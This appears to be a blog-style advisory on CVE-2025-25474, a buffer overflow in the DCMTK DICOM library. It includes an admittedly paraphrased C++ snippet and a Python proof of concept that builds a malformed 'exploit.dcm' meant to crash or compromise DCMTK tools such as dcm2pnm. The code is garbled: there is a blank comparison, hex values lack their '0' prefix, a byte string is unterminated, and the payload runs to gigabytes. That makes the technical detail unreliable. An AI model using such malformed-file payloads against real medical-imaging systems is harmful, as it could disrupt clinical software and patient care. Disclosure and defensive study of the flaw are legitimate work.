DCMTK (DICOM Toolkit) is a widely used open-source library for handling medical images in the DICOM format. Recently, a serious buffer overflow vulnerability—CVE-2025-25474—was discovered in DCMTK versions 3.6.9 and above (DEV branch) in the /dcmimgle/diinpxt.h component. This post breaks down what this means, how the issue can be triggered, and shows a simple proof-of-concept (PoC). If you use DCMTK, you need to read this.
What is CVE-2025-25474?
Simply put, this vulnerability allows attackers to overflow a buffer in the DCMTK code, possibly leading to crashes, information leakage, or remote code execution, depending on context. The culprit lies in improper handling of image pixel data in the diinpxt.h file.
Highlights
- Vulnerable component: /dcmimgle/diinpxt.h
Understanding the Vulnerability
Buffer overflows typically occur when software tries to stuff more data into a buffer (fixed-size chunk of memory) than it can handle. This can lead to overwriting adjacent memory, causing unpredictable behavior.
In DCMTK's /dcmimgle/diinpxt.h, the issue comes from insufficient size checking when parsing image frame data, especially with crafted or corrupted DICOM files.
Example vulnerable code
// DiInputPixelTemplate in diinpxt.h (paraphrased example)
class DiInputPixelTemplate {
public:
DiInputPixelTemplate(...) {
...
if (numPixels > ) {
// Dangerous: no check if numPixels is too large!
pixelData = new Uint8[numPixels];
memcpy(pixelData, src, numPixels); // numPixels can be controlled by attacker
}
...
}
};
What's wrong here?
If an attacker creates a DICOM file with an abnormally large or negative value for numPixels, the allocation and copying may overflow the intended buffer, overwriting critical memory areas.
How to Exploit CVE-2025-25474
The core exploit idea is to create a malicious DICOM file that declares an overly large value for the pixel data size, but provides less actual data, or even enough to overflow the buffer.
Proof-of-Concept (PoC)
Here’s a PoC in simple Python that generates a DICOM file with a massive frame size.
# generates a DICOM file with a mega-sized pixel data element
from pydicom.dataset import Dataset, FileDataset
from datetime import datetime
import os
file_meta = Dataset()
file_meta.MediaStorageSOPClassUID = '1.2.840.10008.5.1.4.1.1.2'
file_meta.MediaStorageSOPInstanceUID = "1.2.3.4"
file_meta.TransferSyntaxUID = "1.2.840.10008.1.2"
ds = FileDataset("exploit.dcm", {}, file_meta=file_meta, preamble=b"\" * 128)
ds.PatientName = "Buffer^Overflow"
ds.PatientID = "BADDICOM"
ds.Rows = xffff # Large number of rows
ds.Columns = xffff # Large number of cols
ds.BitsAllocated = 16
ds.SamplesPerPixel = 1
ds.PhotometricInterpretation = "MONOCHROME2"
ds.PixelData = b"A" * (xffff * xffff * 2) # Overly large pixel data
ds.save_as("exploit.dcm")
print('Malicious DICOM saved as exploit.dcm')
> Warning: Don't open the generated exploit.dcm on a vulnerable system!
>
> Running DCMTK tools like dcm2pnm exploit.dcm triggers the vulnerability.
What’s the Impact?
- Remote Code Execution: Clever attackers might use this to execute arbitrary code on the system running DCMTK tools.
How to Protect Yourself
- Update DCMTK: Monitor OFFIS DCMTK Releases and apply patches once available.
- Fuzz DICOM Inputs: Don’t trust DICOM image files from untrusted sources! Always sanitize or pre-parse files.
- Monitor Security Advisories: See NVD Entry for CVE-2025-25474 (will update as MITRE/NVD process the report).
References
- Official DCMTK Homepage (OFFIS)
- CVE-2025-25474 on NVD (pending)
- Relevant Commit/PR (if public)
- DCMTK dcmimgle Source
- Intro to Buffer Overflows (OWASP)
Final Words
CVE-2025-25474 is a big deal for anyone handling DICOM images or building medical imaging products with DCMTK. Until a patch is released, treat any file as potentially dangerous! Stay updated and always test your medical apps with fuzzed, malformed DICOM images.
*This post is exclusive to help security admins and developers understand the threat and take fast action. Share with your colleagues!*
Timeline
Published on: 02/18/2025 23:15:10 UTC
Last modified on: 02/20/2025 22:15:31 UTC